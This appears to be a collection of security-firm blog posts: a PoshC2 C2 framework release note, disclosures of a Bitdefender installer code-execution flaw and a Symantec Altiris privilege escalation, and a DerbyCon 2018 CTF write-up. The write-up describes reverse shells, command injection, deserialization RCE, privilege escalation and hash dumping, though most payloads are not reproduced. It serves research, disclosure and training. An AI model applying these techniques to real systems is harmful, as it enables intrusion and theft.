Introducing PoshC2 v4.8 – includes C# dropper, task management and more! – Part One

We recently released version 4.8 of PoshC2, which includes a number of fixes and improvements that help facilitate simulated attacks. This is the first post in a series of posts that will include some of the details around the fixes and updates, alongside a number of other posts which will show some of the other cool features we have been working on in the background.

C Sharp (#)

As of PoshC2 version 4.6, a C# implant has been available. The main driver behind this implementation was to stay clear of System.Management.Automation.dll when an environment is heavily monitored and the EDR product can detect loaded modules inside a running process. Granted, not all EDR products are currently doing this, as it can create a hit on performance at the endpoint level, but its important to understand the OPSEC implications of running different C2 droppers.

This has been a work in progress since the release and is continually improving, and we believe this will be the way forward in months to come against advanced blue teams with a good detection and response capability across the organisation. Currently the implant is fully functional and allows an operator to load any C# assembly and execute this in the running process. This allows the user to extend the functionality massively because they’re able to load all the great modules out there in the wild, created by other infosec authors. The way this is loaded uses the System.Reflection namespace. The code can then be called using .NET reflection, which searches inside the current AppDomain for the assembly name and attempts to either run the entry point given or the main method of the executable. An example usage is as follows, for both run-exe and run-dll:



Task Management

One of the issues we’ve overcome in this release was around tracking tasks; there was no way to determine what output related to which issued command. This was largely due to the implant not using task ID’s that were tracked throughout the entire command process flow.

Typically, this was fine because you know what command you’re running, but when multiple people are working on the same instance, or if multiple similar commands are run, then it could be difficult to figure out what output came from which command. This also made tracking failed commands fairly difficult if not impossible to find. The following screenshots shows the output inside the C2Server and the CompletedTasks HTML file:

Figure 1: How commands were issued and returned against an implant

Figure 2: The old format of the tasks report

Furthermore, tasks were only logged in the database when the implant responded with some output. Now, tasks are inserted as soon as they are picked up by the implant with a start time, and updated with a completed time and the desired output when they return. This allows us to track tasks even if they kill the implant or error and never return, and to see how long they took. It also allows us to reference tasks by ID, allowing us to match them in the C2Server log and to only refer to the task by its ID in the response, decreasing message length and improving operational security. An example of the output is shown below:

Figure 3: The new task logging

The generated report then looks like this:

Figure 4: The new report format

User Logging

The astute amongst you will have noticed the new User column in the report above. Another improvement that has been made in relation to tracking tasks is user logging. Now when you start the ImplantHandler you are prompted for a username; it is possible to leave this blank if required, but when PoshC2 is being used as a centralised C2Server with multiple users it’s important to track which user ran which task as shown in the examples below:

Figure 5: You are now prompted for a username when you start the ImplantHandler

All tasks issued from that ImplantHandler instance will be logged as that user, both in the C2Server log and in the report.

Figure 6: If a username is set it is logged in the task output

Figure 7: The username is also logged for the task in the report

For scripting and/or ease of use, the ImplantHandler can also be started with the -u or --user option, which sets the username, avoiding the prompt:

python --user "bobby b"

Beacon Timing

The way beacon sleep times were handled was inconsistent amongst implants, so now we’ve standardised it. All beacon times must now be in the format of value and unit, such as 5m, 10s or 2h. This is then displayed as such for all implant types in the ImplantHandler. As seen below, the fourth column states the current beacon time in seconds, whereas now we show only the output in the newer format.

Figure 8: The old beacon time format

Figure 9: The new beacon time format

Validation has also been added for these, so attempting to set an invalid beacon time will print a suitable error message and do nothing.

Figure 10: The validation message if an invalid format is set

We’ve also changed the implant colour coding so that they are only flagged as timing out if they haven’t checked in for a multiple of their beacon time, as opposed to a hard coded value.

Previously the implants would be coloured as yellow if they hadn’t checked in for 10 minutes or more, and red for 60 minutes or more. Now they are coloured yellow if they have not checked in for 3x beacon time, and red for 10x beacon time, granting far more accurate and timely feedback to the operator.

Figure 11: Implant colour coding has been improved so that the colour is dependent on the beacon time


The C2Viewer was a legacy script used to just print the C2Server log, useful when multiple people want to be able to view and manipulate the output independently.

There were a few issues with the implementation however, and there was a possibility that it would miss output as it polled the database. Additionally, as this was an additional script, it added maintenance headaches for updates to task output.

This file has now been removed, and instead if you want to view the output in the same way, we recommend that you run the C2Server and pipe it to a log file. You can print the log to stdout and a log file using tee:

python -u | tee -a /var/log/poshc2_server.log

This output can then be viewed and manipulated by anyone, such as by using tail:

tail -f -n 50 /var/log/poshc2_server.log

This method has the added benefit of storing all server output. While all relevant data is stored in the database, having a backup of the output actually seen in the log during usage can be extremely useful.

Further details can be found in the

Internal Refactoring

We’re also making strides to improve the internals for PoshC2, refactoring files for clarity, and cutting cyclic dependencies. We aim to modularise the entire code base in order to make it more accessible and easier to maintain, including making changes, but as this is a sizeable change we’ll be doing it incrementally to limit the impact.


There have been quite a few changes made, and we’re aiming to not only improve the technical capabilities of PoshC2, but also the usability and maintainability.

Naturally, any changes come with a risk of breaking things no matter how thorough the testing, so please report any issues found on the GitHub page at:

The full list of changes is below, but as always keep an eye out on the changelog as we update this with any changes for each version to make tracking easier. This is the first blog of a series of blogs on some additional features and capability within PoshC2. Stay tuned for more information.

  • Insert tasks when first picked up by the implant with start time
  • Update task when response returned with output and completed time
  • Log task ID in task sent/received
  • Add ability to set username and associate username to tasks issued
  • Print user in task information when the username is not empty
  • Improved error handling and logging
  • Rename CompletedTasks table to Tasks table
  • Method name refactoring around above changes
  • Pull out implant cores into
  • Rename 2nd stage cores into
  • Stage2-Core.ps1 (previously Implant-Core.ps1 ) is no longer flagged by AMSI
  • Use prepared statements in the DB
  • Refactoring work to start to break up dependency cycle
  • Rename DB to Database in to avoid name clashes
  • Pull some dependency-less functions into to aid dependency management
  • Fix download-file so that if the same file is downloaded multiple times it gets downloaded to name-1.ext name-2.ext etc
  • Adjust user/host printing to always be domain\username @ hostname in implants & logs
  • Fix CreateRawBase payload creation, used in gzip powershell stager and commands like get-system
  • Added ImplantID to Tasks table as a foreign key, so it’s logged in the Tasks report
  • Added for testing checklist/methodology
  • Fix Get-ScreenshotAllWindows to return correct file extension
  • Fix searchhelp for commands with caps
  • Implant timeout highlighting is now based on beacon time – yellow if it’s not checked in for 3x beacon time and red if not checked in for 10x beacon time
  • Setting and viewing beacon time is now consistent across config and implant types – always 50s/10m/1h format
  • Added validation for beacon time that it matches the correct format
  • Fix StartAnotherImplant command for python implant
  • Rename RandomURI column in html output to Context, and print it as domain\username @ hostname
  • Move service instructions to readme so that poshc2.service can just be copied to /lib/systemd/system
  • Removed and added instructions for same functionality to readme just using system commands

CVE-2018-8955: Bitdefender GravityZone Arbitrary Code Execution

We recently identified a vulnerability in the digitally signed Bitdefender GravityZone installer. The vulnerability allows an attacker to execute malicious code without breaking the original digital signature, and without embedding anything malicious into the installer itself. This means that an appropriately positioned attacker can cause the signed installer to run an arbitrary remotely hosted executable.

We consider this to be a vulnerability worthy of analysis because of the way that it works. It is a good example of how developer creativity can bypass otherwise robust security controls.

You can base64 but you can’t hide

Earlier this year, we noticed a tweet about some AV comparison results that prompted us to download an evaluation copy of the Bitdefender GravityZone installer.

The installation is done via a digitally signed executable of about 3.4 MB. We downloaded the installer in a VM, verified the digital signatures, and then noticed an eye-catching file name that caused us to pause. The filename was of the following format:

  • setupdownloader_[base64_string].exe

That was slightly odd, so we decided to find out what that base64 string was used for.  The actual filename of the executable was:

  • setupdownloader_[aHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvXzlKWkJNL2luc3RhbGxlci54bWw-bGFuZz1lbi1VUw==].exe

The base64 string decoded to:


Digging deeper

This was a URL to an XML file, which was interesting enough to prompt us to dig a little deeper. What would happen if we replaced the base64 string with one that points to an XML file controlled by us?

We changed the filename to:

  • setupdownloader_[aHR0cDovL3RoaXNjYW50YmV0cnVlLmNvbS9pbnN0YWxsZXIueG1s].exe”

The base64 in that filename was modified to contain the URL:


We reran the installer and the results are shown below.

As you can see, the executable was attempting to download the XML file from our own domain. At this point, we downloaded the original XML file and examined its contents.

Within the original XML file, we identified the following interesting looking section:

We replaced that entry with:

We then copied the modified XML file over to our HTTP server.

What we had at that point was the signed GravityZone installer that now contained a URL in base64 that in turn pointed to an XML file under our control. The modified XML file had a new downloadUrl entry which pointed to our HTTP server.

Going one step further

We ran the installer again, this time with the modified base64 string and subsequently modified XML file. That gave us the following error message:

We consequently fired up Wireshark and found the HTTP request that was giving us problems:

We were missing an extra sub-directory named win32, and on top of that we noticed that the setup was looking for another XML file, which we didn’t yet have. Note that our guest OS was 32-bit, and for that reason the installer was looking for the 32-bit modules on the remote server.

We had to identify the structure and contents of the data.xml file that the setup was looking for, and the easiest way to find that out was to allow it to contact the original server.

At this point, we used a simple trick to skip looking at encrypted data passing over HTTPS, and so we restored the original download URL back to the installer.xml, but we replaced HTTPS with HTTP instead.

Consequently, we obtained the contents of the data.xml file by locating the relevant HTTP request:

Of course, you could also just download that file by using your web browser. 🙂

Putting everything together

The data.xml file contained a list of the files that will be downloaded. The following image shows a few of them.

The file ended with the final command to be executed, which essentially instructed the setup application to execute one of the downloaded files called “Installer.exe”: <run_command params=”” proc=”Installer.exe” />

As you can see, the setup application blindly trusted the installer.xml file and subsequently the information provided by the downloaded data.xml file.

In other words, we could change that list and the setup application would download and execute a file of our choice, as long as we also provided the correct MD5 hash for it, which of course was not an issue.

To make things worse, an attacker could set up a server with all the legitimate files and just add an extra executable and/or DLL module to the list. This would allow the installation to progress as expected, while silently performing malicious activity on the target system.


We believe that there is a lot that developers can learn from this vulnerability:

  • You must never blindly trust a binary just because it is digitally signed.
  • Even robust security measures can be compromised by subsequently poor implementations.
  • A digital signature can ensure that a file has not been tampered with, but this does not include the filename.

As remediation for this vulnerability, Bitdefender released new patched installers and went through a certificate revocation process of the affected certificates.

Disclosure Timeline

Bitdefender were very responsive throughout the disclosure process. A timeline of key dates are as follows:

  • Date of discovery: 18 March 2018
  • Bitdefender informed: 19 March 2018
  • Bitdefender acknowledged vulnerability: 20 March 2018
  • Bitdefender marked the vulnerability as severe: 29 March 2018
  • Bitdefender requested extra time to address certificates revocation: 12 April 2018
  • Public Disclosure: 16 October 2018

DerbyCon 2018 CTF Write Up

We have just returned from the always amazing DerbyCon 2018 conference. We competed in the 48 hour Capture the Flag competition under our usual team name of “Spicy Weasel” and are pleased to announce that, for the second year in a row, we finished in first place out of 175 teams and netted another black badge.

We’d like to say a big thank you to the organizers of both the conference and the CTF competition, as well as the other competitors who truly kept us on our toes for the entire 48 hours!

As in previous years, we’ve written up an analysis of a small number of the challenges we faced.

Previous Write Ups

Here are the write ups from previous years:




This box took us far too long to get an initial foothold on, but once we gained access the rest came tumbling down quite easily. It was only running two services, as detailed below. Our team spent some time on this box with limited success. It was possible to use the mail service to identify users of the system using the VRFY method to identify susan as a user on the system, as well as use the system to send email. Some time was given to the mail service to send email internally with no output.

Extensive brute forcing of the SSH service was carried out by multiple members of the team over the course of the CTF, with no success.

Susan’s password was eventually recovered, although not through the simple and presumably intended method of brute forcing. We’ll be kind to ourselves and say it was potentially due to network stability issues, since the eventually discovered correct pair of credentials were passed to the server during multiple brute force attempts.

We will come back to Susan later in this post…


There were a number of easy to grab flags that could be retrieved from this box by using dirb to identify a few hidden directories. However, the main part of this box was a site running Elasticsearch.

Our team identified a known vulnerability in the version of Elasticsearch API 1.1.1, which allows for remote code execution. The exploit for this is included in the Metasploit framework by default:

The operating system was identified as Ubuntu 9.10, running a version of the Linux kernel vulnerable to a number of kernel level exploits (2.6.31-14).

Our team decided to utilise Dirty COW, an exploit that adds the account firefart with root access.

It was then possible to log into the server using the firefart account:

There were many flags on this box, one of which was the password of the davekennedy account. Unfortunately, this was one that escaped us due to its discovery in the later part of the CTF and the complexity of the underlying password.

Reviewing the box revealed a number of flags, however of greater use was an SSH key inside the home directory of the user susan.

Susan Continued

Using the discovered SSH key for the user susan, it was possible to gain access to the box Susan.

The box was a trove of flags in many locations, as demonstrated above. Other locations included grub.config and authorised key files. One of the more fun flags was saved in the user’s home directory Pictures/Wallpapers/Untitled.png, which was retrieved from the box; VNC was running on localhost and we saw a number of people port forwarding through the box but we just downloaded the file.

X64 binaries

There were a number of x86, x64 and arm binaries of varying difficulties. We captured the flag from most of these and have opted to show a run through of the x64 series.

Simple (File name: x64.simple.binary)

As expected from the file name, this challenge was very simple. It was a Mach-O 64-bit binary, and when executed it asked the user for a key to continue.


We could see that the user’s input was passed to the _AttemptAuthentication() function as an argument. Looking at that function, we could see that its argument was compared (using strcmp) to – the flag for this challenge.


It is worth noting that there were a significant number of hardcoded red herrings, trying to divert someone who was just looking for strings within the binary.

Medium (File name: x64.medium.binary)

Once again we had a Mach-O 64-bit binary. Similarly to the previous binary, the user was prompted to enter a key when the binary was executed. This time, it looked like things were a bit more complex than a simple strcmp():

Looking a bit deeper into the assembly, it would seem that the users input was compared to a reference string (which looked like a mangled email address) in the following fashion:

  1. Start with the last character of the input string, compare with the first character of the reference string;
  2. Skip backwards 13 characters in the input string, compare with next character of the reference string;
  3. Repeat step 2 until you cannot go further back;
  4. Move the starting point one character back (from last to penultimate), compare with next character of the reference string;
  5. Repeat from step 2, until all 13 possible non-overlapping starting points have been covered.

Knowing that comparison algorithm, one could reverse it until this challenges flag was identified. However, during the pressure of the CTF we opted for a less elegant but quicker and easier way of solving this challenge.

As with the previous challenge, a large number of red herring flags could be found in the file:

It was a reasonable assumption that one of these red herrings would be the valid flag.

With a few lines of Python, we took the list of red herrings, and computed which one(s) could be written using only the characters from the reference string. As it turned out, only one of them matched that condition:


This was the flag for this challenge.

It should be noted that the first character of the user input was not considered when comparing to the reference string. This is why the flag has two m characters, but the reference string contains only one.

Hard (File name: x64.hard.binary)

For the hardest of the x64 binary challenges, we were given two files. One represented a custom filesystem image, and the other was a tool that could read from and write to the given custom filesystem image. This fictional filesystem took the name of DedotatedWamFS. Here’s a screenshot of the tool’s functionality.

Reading the filesystem image we were given, we found a hint in one of the files:

It would seem that the flag was in a file in the filesystem image, but the user remembered to delete it (since it wasn’t in any of the other files in the filesystem).

Disassembling the binary, we started by identifying the tool’s core functionality:


Looking at the DELETE sub-routine, we were able to identify that deleted files are marked with a binary flag.

With that in mind, the first thing we needed was the name of the deleted flag file. We looked into the LIST sub-routine, and identified a code section which would only list the file if it had not been deleted, by checking the flag.

We patched that section of the binary, so that the tool wouldn’t check whether the file was deleted or not.

We had found the deleted file – flag.txt. We proceeded to look into the READ sub-routine; once again we identified a simple check to confirm whether the file was deleted or not. We patched that section of the code out and could then read the file.

It looked like the deleted flag.txt file was encoded or encrypted. We went a bit further disassembling the executable, into a sub-routine we identified as WRITE.

It seemed like the file was encoded using a rotating XOR single-byte key. Every byte of the file was XOR’ed with a byte key, which is then incremented by 0x07. The original XOR byte key could not be recovered through reverse engineering alone, because it was based on a random value.

However, since it was a single byte, we could simply brute force the 256 possible values. We wrote a few lines of Python for this. The flag file contents we recovered were:



There were two services available: SSH and a web server.

Browsing to the website on port 8080 presented a Jenkins portal that allowed for self-registration.

Jenkins is an open source software written in Java that has a known exploitation path by use of the Script Console. As described on the Jenkins web site: “Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents.” While Jenkins now offers protections to limit access from non-administrators, the installed version did not offer those protections.

We registered for an account, which allowed for access to the “Manage Jenkins” features and the Script Console.

We then used one of the reverse shells belonging to pentestmonkey:

It was possible to gain a reverse shell running in the context of the user Jenkins on this system.

From that shell, it was possible to gain a full TTY session by using the python3 installation on the host. This allowed access to a few of the five flags on this host.

Access to a root shell was gain by breaking out of the less program. Within the sudoers file, the Jenkins user was defined as having the ability to run the less program against the syslog file without requiring a password. Once a root shell was obtained, access to the CTF user’s password was gained from the .bash_history file. This user was defined within the sudoers file as having all root permissions. That account allowed us to access the SSH service bypassing the Jenkins service and gaining the rest of the flags on the host.


We discovered that default installation pages for the osCommerce application were accessible.

This was particularly interesting as publicly available exploits exist, which can be executed by an unauthenticated user, resulting in code execution on the underlying server.

Our actions were fairly limited because we were executing commands in context of the www-data user. As such, the next step was to compile, upload and execute a kernel-based privilege escalation exploit (CVE-2016-4557) for more meaningful access.

Executing the exploit provided us with a root shell, and the ability to read files without restriction.

After scooping up most of the file-based flags, the next step was to compromise the MySQL database of the application. We found credentials for the debian-sys-maint user and used these to log into the MySQL database.

Displaying the contents of the administrators table provided us with access to the final flag on osCommerce.

Quiz System

Based on the directory structure, file names and application name, we were relatively confident that the source code of Quiz System was publicly available at this link:

After downloading the application, we began to search for SQL injection vulnerabilities which would result in access to the underlying system.

The /admin/ajx-addcategory.php file had a parameter called catname which was vulnerable to SQL injection attacks.

We created the following requests file and fed this into sqlmap. This resulted in code execution on the underlying server in the context of the www-data user.

Sqlmap creates an upload file when the --os-shell flag is used. This was particularity useful as it allowed us to upload a PHP payload which provided us with a shell on the underlying system.

After inspecting the /etc/passwd file, we identified that there were two users of interest, quiz and root. Both users shared the same password, which we fortuitously guessed to obtain root access and access all file-based flags.


Facepalm update: The DerbyCon CTF team got in touch with us and let us know that while the attack path described here is valid, it was not the intended path.  Apparently there was a WordPress username – djohnston- embedded in the HTML comments somewhere, and that user has a password of Password1 for wp-admin.  Certain members of our team maintain they attempted this with no success but… *cough* 🙂

This challenged included a WordPress based blog – the EquiHax Blog.

There was an XXE flaw which allowed us to view the contents of server-status because it was available to localhost.  Through that, we found a file named dir.txt which was accessible under the wp-admin directory. This file provided a listing of all files in this directory.

Interestingly, the 050416_backup.php file was originally intended to be named pingtest.php.

The purpose of this file was to feed an IP or domain argument, via the host parameter, into /bin/ping. As this file executed system commands, we are able to add a semi-colon to end the ping command and issue commands of our choice. Consequently, we spun up a temporary web server and hosted a password-protected web shell. This was then downloaded to the WordPress server by using wget.

Having a web shell allowed us to execute further commands, as well as upload and download files. We leveraged the existing python3 interpreter on the WordPress box to obtain a reverse TCP shell in context of the www-data user. After inspecting the groups for this user, we identified that www-data was part of the sudo groups, which enabled us to easily escalate our privileges to root.

After scooping up most of the file-based flags, the next step was to compromise the applications MySQL database. Credentials for accessing the database were located in the wp-config.php file. Displaying the contents of the administrators table provided us with access to the final flag on WordPress.

Equihax Chat Server

This server hosted two applications: a dd-wrt firewall on port 80 and a custom chat application on port 443. The information presented by the dd-wrt firewall implied that this host bridged the two networks in scope together.

It also had an RDP service available, even though the dd-wrt application implied it was a Linux box.

It was our assumption that the HTTPS and RDP ports were being reversed proxied from host(s) within the second network, but we ran out of time and could not confirm this.

Returning to the custom application, we had the option of logging in using either IdentETC or IdentLDAP. This seemed like a bit of a hint that the application was able to use the credentials from an enterprise authentication system. It might be connected to something bigger.

We guessed the weak credentials and were able to log in (chat/chat) with the IdentETC method.

Once logged in, we found a simple chat interface where you could post a message and subscribe/unsubscribe from the Public channel.

We then identified an interesting looking session cookie. When you first entered your credentials using the IdentETC method, these are POSTed to the /Login page. This set a cookie called session and then a redirect to /Chat was triggered. By examining the session cookie, we could see that it was made up of a number of parts, all delimited by a colon.

We decoded the session cookies value and obtained the following output.

That was interesting; even though we were using the IdentETC method of authentication, it was actually using the IdentLDAP method behind the scenes to log us in.

Remember the RDP that was open? Well, guess which credentials worked on that!

It quickly became apparent that we were not the only people with these credentials as we were being kicked out from our RDP session on a very regular basis. To ensure we maintained access, we dropped C2 and started to enumerate the machine and the domain.

We noticed that the one of the other users to have logged into the device was scott; it turned out that account was part of the domain admins group.

Further investigation also confirmed that this device was located on a network segment inaccessible from the rest of the network ( instead of

It was then possible to use our access to this machine to begin to explore the “internal” network range and to begin attacking the domain. After a while (actually a disappointingly long time) we discovered that scott was using his username as a password.

We could then use scott’s credentials and the foothold we’d gained on the chat server to pivot to the domain controller and start hunting for flags. One of the things we did was dump the hashes pulled from the domain controller and feed them into our hash cracking machine.

Within in a few minutes we had retrieved 1,372 passwords. We picked one of the passwords at random and submitted it; 2 points.

We therefore likely had a load of low value flags that needed to be submitted, but being the lazy hackers we are, no one was really in the mood to submit 1,372 flags manually; automation to the rescue! We quickly put together a Python script to submit the flags on our behalf, and got back to hacking while the points slowly trickled in.

Chat Server Continued…

What was completely conspicuous by its absence was any form of integrity checking on the session cookie (this should have been implemented through the use of MAC, utilising some form of strong sever side secret).

We could see that the cookie was the serialized form of a binary object. When the cookie was sent to the server, it was likely deserialized back into a graph of binary objects. The serialized form defines the objects to be instantiated and the values to be copied into them. You can’t send the declaration of an object; only its data. This doesn’t mean it isn’t possible to build a graph that will execute code, though.

A fantastic example of this is Gabriel Lawrence and Chris Frohoff’s ysoserial tool for Java. To understand this concept further, we can’t recommend their talk “Marshalling Pickle’s” enough:

Ruby on Rails has gadgets for RCE via derserialization via the ActiveSupport, which we tried, but unfortunately this was not a Rails application. Then…

It didn’t appear to be a User object, though.

Well, it just happened to be assigned in a different location. Once you had logged in the redirect to /Chat caused a second part of the cookie to be set.

As we can see here, and comparing to the previous session cookie screenshot, the section of the session cookie before the first delimiter had dramatically increased.

The serialized object now contained a Userid and indentToken. Doing some research, we found that these classes are part of the SHIPS ( toolkit that TrustedSec has put on GitHub.

One of the gems inside this project is called usa. It contains the definition for IdentLDAP and IndentETC, along with a very interesting definition called IdentETCNoPass. Despite a bit of time spent on authenticating with that object, no shell was forthcoming – time for a break.

The break involved learning as much as possible about Ruby, looking at some of the other challenges and watching the Offspring, who were awesome.

Coming back to this and thinking about the clue earlier, it was time to try and mock a Ruby object, serialize it and see what happened. To do this we needed a Ruby environment and for this we used – essentially an online code test environment.

With Ruby serialization, only the name of the object has to match during deserialization; any matching members will be populated with the values passed through. Here we were able to mock the User object completely, then serialize it and encode it in Base64. The payload in both the indentType and identToken here was a string that should execute the ping command:

Here is the serialized and encoded form.

And here are the pings coming back after the sending the cookie in:

So where is the flag? Well, unfortunately we only worked this out with 15 minutes of the CTF to go, so despite gaining code execution the flag eluded us. Ah well, it was still a really cool challenge that we had some epic learning from.


Having used the Equihax Chat Server to compromise the domain controller and pivot into the internal network, we were faced with some new machines. This was one of them.

In order to find OTRS, we ran various reconnaissance tools post foothold against the internal network of The first was an ARP scan of the network, as shown below. This identified two additional hosts, & was on the inside of the dd-wrt host, which was later revealed not to be exploitable.

After we compromised both Windows hosts within the internal network, we performed a portscan to find out if any additional ports were open from the domain controller. However, it appeared that all ports were available to both hosts on the network.

It was noted that the more stable host was the DC and as such we deployed a SOCKS proxy server from the domain controller ( The SOCKS proxy allowed us to build a tunnel through the compromised host and funnel all traffic through to the target environment from our own hosts. This feature allowed us to access a number of resources, including connecting remote desktop (RDP) sessions and internal web sites such as OTRS.

The following screenshot shows the homepage of the OTRS software which was identified using lateral movement techniques from the internal domain controller.

After some additional external reconnaissance, it was identified that this software was used as an aid to helpdesk staff for raising tickets internally. By clicking the link shown below, it moved to a login prompt which was found to have easily guessable credentials of helpdesk/helpdesk.

Once connected to the OTRS software as a standard user, the following ticket information was available.


After looking inside the tickets, the following hint was given:

“Hey Jim I am still working on getting this helpdesk app setup since management insists we actually have to take care of the darn users now.

I know the password I set was Swordfish but I can’t remember what the administrator account name was. Anyway now that this thing is stood up we might as well use it”

Swordfish was both the password for an administrator level account on this software as well as a flag. We had to identify the default account for this host and found this by doing some research on the Internet. This was root@localhost.


We discovered from conducting research against this software (OTRS 6.0.1) that two publicly disclosed vulnerabilities exist in it. One is abusing the packet manager and uploading a new packet which is vulnerable to code execution, and the other abuses the PGP keys which can also achieve code execution.

Only one of the two appeared to work in this environment (CVE-2017-16921) which affected the PGP keys deployment. More information on these vulnerabilities can be found here:

The essence of the vulnerability was editing the PGP::Bin file and parameters to execute some other binary; in this example we used a simple Python reverse TCP connection.



The payload used was:

Once we had a foothold on the host, we identified it was running as the apache user and privilege escalation was required. The usual escalation techniques were attempted and a SetUID binary that seemed out of place was identified.

Using the foothold, we executed the following commands to extract the hashes:

The -O flag writes the contents of the archive to the screen.  However, this didn’t obtain a flag, or at least not until we were able to crack the root password which we didn’t complete before the end of the CTF. In doing this it did reveal that the user’s password for OTRS was OTRS.


To obtain a full root shell to access the flag we could have either guessed the location, tar’d the entire root folder, or replaced the /etc/shadow & /etc/passwd file to create a new UID 0 user.  We got root access and used PoshC2 for handling our shells, including on this box, as shown below.

There may have been other flags on this host but we ran out of time to find them.

Web Credit Report Dispute Application

This server hosted a custom credit report dispute application. As a pre-authenticated user we were able to create a dispute, but in order to find more of the functionality, we needed to be able to login.

Clicking on the “Create a report” link, we were taken to the “Problem Report form”. As this page was pre-authentication and there was an authenticated section to the application, we immediately started thinking this might be some kind of stored XSS or SQLi. We spent a bit of time fuzzing, which ultimately showed this not to be the case.

Okay then, let’ try and log in.

After a bit of fuzzing on the login form, it turned out that you could log in using the username:password combination of Admin:. Interesting; it looked like there was some kind of injection vulnerability on the password field. We decided we’d roll with it for the moment and see if it anything more could be done with it later.

Once we were authenticated, we got to the /viewreports.php page shown below. It contained all of the reports that had been created. Thanks to fellow CTFers’ prodigious use of Burp Suite Active Scan, there were quite a few reports listed. It was also difficult to understand when one was created – something we later found a solution to.

Clicking on any of the links here took you to the /viewreport.php page again, this time detailing all the information that the relevant user had submitted.

Locating a report that we had just created was a little on hard side; the actual report created looked like it contained some kind of timestamp. Unfortunately, no ID was returned when you created a report either. The solution is documented a little further down.

The rpt field was found to have a path traversal vulnerability, but by far the most interesting part of the page was the “I have fixed this!” link. Viewing the source of the page and decoding the URL using the Burp shortcut ctrl+shift+u, we could see that the rename.php page took two parameters, old & new, which just happened to take file paths as values.

Our immediate thought was to inject PHP via the create report page, locate it on the view requests page, move it so it had a PHP extension, navigate to it and BOOM code execution.

If only it was that simple; it was indeed possible to change the file extension to PHP, PHP5 and PHPS, however all the fields in the Report Creation page were being escaped on output, exactly as can be seen here with the first name field:

Okay, so how was it possible to easily spot the page that had just been created?

Well, no Spicy Weasel write-up is complete without the use of LinqPad, our favourite C# scratchpad tool ( For those interested in beginning .NET development, this is an excellent tool to experiment with.

The idea was to write a script that would retrieve the listing of the viewreport.php page, persist the current entries and then on every subsequent run check for any new pages. To persist between runs, a static class with static container members was created. LinqPad can use a new process per run of the script which would destroy our static container. To ensure that the results were persisted between runs, the following settings were created (performed by right clicking the query and selecting properties).

Who said you can’t parse HTML with a regex? 🙂

Checking out the server header, we could see that somewhat unusually for a PHP application, it was hosted on Windows. This suddenly made the rename.php file a lot more interesting.

What if the page can read and write to UNC paths..?

So yes, it turns out UNC paths could be read. The problem, though, was that IIS was running with no network credentials, and modern SMB is designed to make it as difficult as possible to allow connections by hosts with no credentials.

By deliberately weakening the SMB configuration on a virtual machine, it was possible to successfully have a file read by sending the request in the screenshot above. This allowed the uploading of a PHP file that kicked off a PowerShell Posh C2 ( one liner, giving us a shell to go searching for the flags.

Once we identified that vulnerability in the application, we hosted a PHP file which executed PowerShell on the remote host using PoshC2.


Once we had C2 on this host, we discovered it was running as the IUSR, which is a low level IIS application user. We attempted various standard privilege escalation checks against the host and concluded it was a Server 2016 box with no trivial escalation vulnerabilities other than no patches applied. Eternal Blue (MS17-010) could have been an option but this is normally unstable for Server 2016 and was probably not the intended exploit for this host.

After further enumeration of the host we identified two more flags on the system using the command below:

This yielded:

  • info.php:2:header(‘Flag: TheBruteForceIsStrongInThisOne’);
  • viewreports.php:19:header(‘Flag: InjectionHeaders’);

We also found a file inside the adminscripts folder that had a hint inside suggesting that this was a scheduled task that ran every five minutes. We added an additional line to execute our PowerShell payload:

This allowed us to obtain administrator level privileges on the host with PoshC2, as shown below. We then extracted the hashes of all users and cracked the password for the administrator user, which was a large flag, as well as one from the administrators’ desktop.


It should be noted that all Windows 2016 hosts had Windows Defender enabled, which was blocking malicious PowerShell.

As such we needed to migrate to inject the PoshC2 shellcode, which employs the AMSI bypass released by @mattifestation:

Equihax License Validator (fu3) – Keygen Project

The Equihax licensing server had one objective – download the application and try to reverse engineer the .NET application to create a keygen to submit back to the original site for verification.

We first identified it was a .NET assembly by running the file command on Linux.

We used iLSpy to decompile the binary, but it generated the following error when trying to decompile validateLicense function.


We then downloaded the latest version of iLSpy ( which successfully decompiled the code back to C#.


The first section of the code took the users first name and MD5 hashed that value. It then took the first eight characters of that substring and used it in the next part of the code. It also had a static string that it used as part of the keygen creation ( Kc5775cK).

By using the algorithm in the above code, we could simply create our own StringBuilder string and spit it out using LINQPad. There was also some unnecessary code below this, but we didn’t need that to generate the license. Here’s the code for this project and the generated license key.

The full source code is as follows.

This yielded the flag.


There was a downright evil box that hosted a MUD, courtesy of @Evil_Mog. With the exception of a couple of simple flags, we were unable to gain any traction here. This tweet says it all…


This year’s DerbyCon was as fun as ever, and we really enjoyed participating in the CTF competition. Hopefully you can find some value in us sharing portions of the competition with you.

We’re always grateful for the opportunity to practise our craft and we recognise the sheer effort required to put on an event like DerbyCon, including the annual DerbyCon CTF. Once we’ve rested up, we’ll be looking forward to next year!

CVE-2018-5240: Symantec Management Agent (Altiris) Privilege Escalation

During a recent red team exercise, we discovered a vulnerability within the latest versions of the Symantec Management Agent (Altiris), that allowed us to escalate our privileges.


When the Altiris agent performs an inventory scan, e.g. software inventory scan, the SYSTEM level service re-applies the permissions on both the NSI and Outbox folders after the scan is completed.

  • C:\Program Files\Altiris\Inventory\Outbox
  • C:\Program Files\Altiris\Inventory\NSI

The permissions applied grant the ‘Everyone’ group full control over both folders, allowing any standard user to create a junction to an alternative folder. Thus, the ‘Everyone’ permission is placed on the junction folder, enforcing inheritance on each file or folder within this structure.

This allows a low privilege user to elevate their privileges on any endpoint that has Symantec Management Agent v7.6, v8.0 or v8.1 RU7 installed.

Analysis – Discovery

When performing red team engagements, it is common to come across different types of third party endpoint software installed on a host. This type of software is always of interest, as it could be a point of escalation on the host, or potentially across the environment.

One example of endpoint management software we’ve often seen is Altiris by Symantec. This software is an endpoint management framework that allows an organisation to centrally administer their estate to ensure the latest operating system patches are applied, to deliver software, to make configuration changes based on a user’s role or group, and to perform an inventory asset register across the entire estate.

The version that this was tested by Nettitude was version 7.6, as shown throughout this release, however it was confirmed by Symantec on 12 June 2018 that all versions prior to the patched version are affected by the same issue.

We noticed that folders within the Altiris file structure had the ‘Everyone – Full Control’ permission applied. These folders seemed to contain fairly benign content, such as scan configuration files and XML files, from what we believed to be the inventory scan or output from a recent task. These folder and file permissions were found using a simple PowerShell one liner which allowed us to perform an ACL review on any Windows host, using only the tools on that host. An example of this one liner is as follows:

